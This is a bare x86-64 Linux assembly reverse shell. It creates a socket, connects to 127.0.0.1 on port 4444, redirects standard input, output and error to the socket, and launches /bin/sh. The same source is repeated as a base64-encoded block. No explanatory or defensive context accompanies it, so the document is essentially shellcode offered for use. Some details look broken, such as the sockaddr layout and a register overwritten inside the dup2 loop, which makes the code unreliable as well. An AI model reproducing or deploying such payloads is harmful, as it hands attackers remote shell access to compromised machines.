section .data
    ip_address db 127,0,0,1    ; IP address: 127.0.0.1
    port dw 0x5c11             ; Port: 4444 (0x115c in little endian)
 
section .text
    global _start
 
_start:
    ; socket(AF_INET, SOCK_STREAM, 0)
    mov rax, 41                ; syscall: socket
    mov rdi, 2                 ; AF_INET
    mov rsi, 1                 ; SOCK_STREAM
    xor rdx, rdx               ; Protocol 0
    syscall
 
    mov rdi, rax               ; Save socket descriptor
 
    ; Prepare sockaddr_in structure
    ; struct sockaddr_in {
    ;     short sin_family;    // AF_INET
    ;     unsigned short sin_port;  // Port number
    ;     struct in_addr sin_addr;  // IP address
    ;     char sin_zero[8];
    ; };
    push rdx                   ; sin_zero
    mov rbx, 0x0100007f        ; 127.0.0.1 in hex
    shl rbx, 16
    mov bx, 0x5c11             ; Port 4444
    push rbx
    mov rsi, rsp               ; Pointer to sockaddr_in
 
    ; connect(socket, sockaddr_in, 16)
    mov rax, 42                ; syscall: connect
    mov rdx, 16                ; Size of sockaddr_in
    syscall
 
    ; Duplicate socket descriptor to stdin, stdout, stderr
    mov rsi, 0
.dup_loop:
    mov rax, 33                ; syscall: dup2
    mov rdi, rdi               ; Socket descriptor
    syscall
    inc rsi
    cmp rsi, 3
    jl .dup_loop
 
    ; execve("/bin/sh", NULL, NULL)
    xor rdx, rdx               ; NULL
    push rdx
    mov rbx, 0x68732f6e69622f2f
    push rbx
    mov rdi, rsp               ; Pointer to "/bin/sh"
    push rdx
    push rdi
    mov rsi, rsp               ; argv
    mov rax, 59                ; syscall: execve
    syscall

c2VjdGlvbiAuZGF0YQogICAgaXBfYWRkcmVzcyBkYiAxMjcsMCwwLDEgICAgOyBJUCBhZGRyZXNzOiAxMjcuMC4wLjEKICAgIHBvcnQgZHcgMHg1YzExICAgICAgICAgICAgIDsgUG9ydDogNDQ0NCAoMHgxMTVjIGluIGxpdHRsZSBlbmRpYW4pCgpzZWN0aW9uIC50ZXh0CiAgICBnbG9iYWwgX3N0YXJ0Cgpfc3RhcnQ6CiAgICA7IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgMCkKICAgIG1vdiByYXgsIDQxICAgICAgICAgICAgICAgIDsgc3lzY2FsbDogc29ja2V0CiAgICBtb3YgcmRpLCAyICAgICAgICAgICAgICAgICA7IEFGX0lORVQKICAgIG1vdiByc2ksIDEgICAgICAgICAgICAgICAgIDsgU09DS19TVFJFQU0KICAgIHhvciByZHgsIHJkeCAgICAgICAgICAgICAgIDsgUHJvdG9jb2wgMAogICAgc3lzY2FsbAoKICAgIG1vdiByZGksIHJheCAgICAgICAgICAgICAgIDsgU2F2ZSBzb2NrZXQgZGVzY3JpcHRvcgoKICAgIDsgUHJlcGFyZSBzb2NrYWRkcl9pbiBzdHJ1Y3R1cmUKICAgIDsgc3RydWN0IHNvY2thZGRyX2luIHsKICAgIDsgICAgIHNob3J0IHNpbl9mYW1pbHk7ICAgIC8vIEFGX0lORVQKICAgIDsgICAgIHVuc2lnbmVkIHNob3J0IHNpbl9wb3J0OyAgLy8gUG9ydCBudW1iZXIKICAgIDsgICAgIHN0cnVjdCBpbl9hZGRyIHNpbl9hZGRyOyAgLy8gSVAgYWRkcmVzcwogICAgOyAgICAgY2hhciBzaW5femVyb1s4XTsKICAgIDsgfTsKICAgIHB1c2ggcmR4ICAgICAgICAgICAgICAgICAgIDsgc2luX3plcm8KICAgIG1vdiByYngsIDB4MDEwMDAwN2YgICAgICAgIDsgMTI3LjAuMC4xIGluIGhleAogICAgc2hsIHJieCwgMTYKICAgIG1vdiBieCwgMHg1YzExICAgICAgICAgICAgIDsgUG9ydCA0NDQ0CiAgICBwdXNoIHJieAogICAgbW92IHJzaSwgcnNwICAgICAgICAgICAgICAgOyBQb2ludGVyIHRvIHNvY2thZGRyX2luCgogICAgOyBjb25uZWN0KHNvY2tldCwgc29ja2FkZHJfaW4sIDE2KQogICAgbW92IHJheCwgNDIgICAgICAgICAgICAgICAgOyBzeXNjYWxsOiBjb25uZWN0CiAgICBtb3YgcmR4LCAxNiAgICAgICAgICAgICAgICA7IFNpemUgb2Ygc29ja2FkZHJfaW4KICAgIHN5c2NhbGwKCiAgICA7IER1cGxpY2F0ZSBzb2NrZXQgZGVzY3JpcHRvciB0byBzdGRpbiwgc3Rkb3V0LCBzdGRlcnIKICAgIG1vdiByc2ksIDAKLmR1cF9sb29wOgogICAgbW92IHJheCwgMzMgICAgICAgICAgICAgICAgOyBzeXNjYWxsOiBkdXAyCiAgICBtb3YgcmRpLCByZGkgICAgICAgICAgICAgICA7IFNvY2tldCBkZXNjcmlwdG9yCiAgICBzeXNjYWxsCiAgICBpbmMgcnNpCiAgICBjbXAgcnNpLCAzCiAgICBqbCAuZHVwX2xvb3AKCiAgICA7IGV4ZWN2ZSgiL2Jpbi9zaCIsIE5VTEwsIE5VTEwpCiAgICB4b3IgcmR4LCByZHggICAgICAgICAgICAgICA7IE5VTEwKICAgIHB1c2ggcmR4CiAgICBtb3YgcmJ4LCAweDY4NzMyZjZlNjk2MjJmMmYKICAgIHB1c2ggcmJ4CiAgICBtb3YgcmRpLCByc3AgICAgICAgICAgICAgICA7IFBvaW50ZXIgdG8gIi9iaW4vc2giCiAgICBwdXNoIHJkeAogICAgcHVzaCByZGkKICAgIG1vdiByc2ksIHJzcCAgICAgICAgICAgICAgIDsgYXJndgogICAgbW92IHJheCwgNTkgICAgICAgICAgICAgICAgOyBzeXNjYWxsOiBleGVjdmUKICAgIHN5c2NhbGw=